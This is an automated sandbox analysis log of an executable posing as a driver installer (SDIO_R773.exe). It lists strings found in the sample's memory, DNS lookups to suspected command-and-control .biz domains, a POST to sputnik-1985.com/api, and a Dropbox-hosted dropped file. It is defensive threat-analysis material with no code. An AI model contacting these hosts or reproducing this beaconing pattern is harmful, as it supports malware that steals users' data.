              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.co equals www.youtube.com (Youtube)
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://*.dropbox.com ; base-uri 'self' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; font-src https://* data: ; img-src https://* data: blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-SIs+rPrP3KYvK5g0EjVvZjT67gE=' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: X-Dropbox-Request-Id79515ab1b4684a798833d4306d5120c7X-Dropbox-Response-Originfar_remoteX-Xss-Protection1; mode=blockX-Robots-Tagnoindex, nofollow, noimageindexX-Permitted-Cross-Domain-PoliciesnoneX-Content-Type-OptionsnosniffReferrer-Policystrict-origin-when-cross-originContent-Security-Policyreport-uri https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic ; script-src 'unsafe-eval' 'strict-dynamic' 'nonce-SIs+rPrP3KYvK5g0EjVvZjT67gE=' 'nonce-Or+ZDAYwRQ2id8utyu+MWkyzUbI='Content-Security-Policyform-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://*.dropbox.com ; base-uri 'self' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; font-src https://* data: ; img-src https://* data: blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-SIs+rPrP3KYvK5g0EjVvZjT67gE=' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/en
              Source: SDIO_R773.exe, 00000000.00000003.2060608569.000000000488D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; frame-ancestors 'self' https://*.dropbox.com ; base-uri 'self' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; font-src https://* data: ; img-src https://* data: blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js 'nonce-SIs+rPrP3KYvK5g0EjVvZjT67gE=' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: equals www.yahoo.com (Yahoo)
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://playX equals www.youtube.com (Youtube)
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ww.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: punishzement.biz
              Source: global trafficDNS traffic detected: DNS query: fraggielek.biz
              Source: global trafficDNS traffic detected: DNS query: grandiouseziu.biz
              Source: global trafficDNS traffic detected: DNS query: littlenotii.biz
              Source: global trafficDNS traffic detected: DNS query: marketlumpe.biz
              Source: global trafficDNS traffic detected: DNS query: nuttyshopr.biz
              Source: global trafficDNS traffic detected: DNS query: spookycappy.biz
              Source: global trafficDNS traffic detected: DNS query: truculengisau.biz
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: sputnik-1985.com
              Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
              Source: global trafficDNS traffic detected: DNS query: uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sputnik-1985.com
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 11 Jan 2025 10:56:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tzbaan%2BbMZdyza9E272uibNSfg7z6UnnCwAGXLx0u7W4u5ZuO4Y5bIz4JqTcM3eNkZKRC12A0S83xHaYDRgPB6nAfihUeGTeFK08wuc3QVp6Kj8FuB4uPxotxq5PpGxf%2BK3a"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 900460ffcfa77c6a-EWR
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
              Source: SDIO_R773.exe, 00000000.00000003.1969345473.0000000004817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: SDIO_R773.exe, 00000000.00000003.1969345473.0000000004817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: SDIO_R773.exeString found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
              Source: SDIO_R773.exeString found in binary or memory: http://cevcsca2021.ocsp-certum.com07
              Source: SDIO_R773.exeString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
              Source: SDIO_R773.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
              Source: SDIO_R773.exeString found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
              Source: SDIO_R773.exe, 00000000.00000003.1969345473.0000000004817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: SDIO_R773.exe, 00000000.00000003.1969345473.0000000004817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: SDIO_R773.exe, 00000000.00000003.1969345473.0000000004817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: SDIO_R773.exe, 00000000.00000003.1969345473.0000000004817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: SDIO_R773.exe, 00000000.00000003.1969345473.0000000004817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: SDIO_R773.exeString found in binary or memory: http://fsf.org/
              Source: SDIO_R773.exe, 00000000.00000003.1969345473.0000000004817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: SDIO_R773.exe, 00000000.00000003.1969345473.0000000004817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: SDIO_R773.exeString found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
              Source: SDIO_R773.exeString found in binary or memory: http://repository.certum.pl/ctnca.cer09
              Source: SDIO_R773.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
              Source: SDIO_R773.exeString found in binary or memory: http://repository.certum.pl/ctsca2021.cer0A
              Source: SDIO_R773.exeString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: SDIO_R773.exeString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: SDIO_R773.exeString found in binary or memory: http://subca.ocsp-certum.com01
              Source: SDIO_R773.exeString found in binary or memory: http://subca.ocsp-certum.com02
              Source: SDIO_R773.exeString found in binary or memory: http://subca.ocsp-certum.com05
              Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
              Source: SDIO_R773.exeString found in binary or memory: http://www.certum.pl/CPS0
              Source: SDIO_R773.exeString found in binary or memory: http://www.gnu.org/licenses/
              Source: SDIO_R773.exeString found in binary or memory: http://www.gnu.org/philosophy/why-not-lgpl.html
              Source: SDIO_R773.exeString found in binary or memory: http://www.snappy-driver-installer.org/downloads/SDIO_Update.torrenthttp://www.snappy-driver-install
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: SDIO_R773.exe, 00000000.00000003.1969345473.0000000004817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: SDIO_R773.exe, 00000000.00000003.1969345473.0000000004817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
              Source: SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2069109357.000000000488B000.00000004.00000800.00020000.00000000.sdmp, NOUBJXTSUL2YOW34.exe.0.drString found in binary or memory: https://assets.dropbox.com/www/en-us/illustrations/spot/target-miss.svg
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cd
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
              Source: SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.(
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
              Source: SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2069109357.000000000488B000.00000004.00000800.00020000.00000000.sdmp, NOUBJXTSUL2YOW34.exe.0.drString found in binary or memory: https://cfl.dropboxstatic.com/static/images/favicon.ico
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2067570431.0000000000D23000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000002.2069109357.000000000488B000.00000004.00000800.00020000.00000000.sdmp, NOUBJXTSUL2YOW34.exe.0.drString found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css
              Source: SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: SDIO_R773.exe, 00000000.00000003.1828364146.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828478949.000000000481E000.00000004.00000800.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1828082972.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampow
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
              Source: SDIO_R773.exe, 00000000.00000002.2066797770.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com
              Source: SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
              Source: SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1816198825.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
              Source: SDIO_R773.exe, 00000000.00000003.1816164799.0000000000D70000.00000004.00000020.00020000.00000000.sdmp, SDIO_R773.exe, 00000000.00000003.1810021727.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
